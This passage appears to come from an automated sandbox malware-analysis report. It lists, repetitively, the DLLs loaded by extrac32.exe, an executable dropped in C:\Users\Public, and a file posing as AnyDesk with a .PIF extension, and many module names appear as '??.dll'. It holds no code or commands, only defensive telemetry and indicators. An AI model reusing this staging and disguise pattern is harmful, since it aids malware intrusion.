                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: version.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: url.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??????p.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
